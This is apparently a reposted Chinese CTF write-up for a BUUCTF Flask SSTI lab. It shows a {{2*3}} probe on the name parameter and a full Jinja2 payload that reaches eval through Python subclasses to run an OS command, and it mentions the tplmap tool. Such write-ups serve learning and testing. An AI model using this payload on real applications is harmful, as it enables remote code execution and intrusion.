[Flask]SSTI

文章目录

环境

BUUCTF上的在线环境,启动靶机,获取链接:
http://node4.buuoj.cn:27904

解题思路

访问后显示页面。

[Flask]SSTI
根据题目提示是考SSTI,所以我们传个name参数看看。
http://node4.buuoj.cn:27904/?name=12,将我们的12显示在页面。
[Flask]SSTI
我们在构造{{2*3}}看看,是否存在SSTI。
[Flask]SSTI
成功执行了乘法,说明是存在SSTI的,接下来我们要做的是寻找可以执行命令的函数所在的类。
这里我在网上找的:
{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__ == 'catch_warnings' %}
  {% for b in c.__init__.__globals__.values() %}
  {% if b.__class__ == {}.__class__ %}
    {% if 'eval' in b.keys() %}
      {{ b['eval']('__import__("os").popen("id").read()') }}
    {% endif %}
  {% endif %}
  {% endfor %}
{% endif %}
{% endfor %}

[Flask]SSTI
成功执行,接下来找flag,最后发现在env中发现了flag。
[Flask]SSTI
通过网上的资料了解到tplmap脚本可以梭哈。
[Flask]SSTI

参考

https://blog.csdn.net/qq_36241198/article/details/114882798
SSTI模板注入绕过(进阶篇)
SSTI模板注入及绕过姿势(基于Python-Jinja2)
[Flask(Jinja2)服务端模板注入漏洞(SSTI)]学习简记

Original: https://blog.csdn.net/weixin_44033675/article/details/121409647
Author: 1ance.
Title: [Flask]SSTI

原创文章受到原创版权保护。转载请注明出处:https://www.johngo689.com/746375/

转载文章受原作者版权保护。转载请注明原作者出处!

(0)

大家都在看

亲爱的 Coder【最近整理,可免费获取】👉 最新必读书单  | 👏 面试题下载  | 🌎 免费的AI知识星球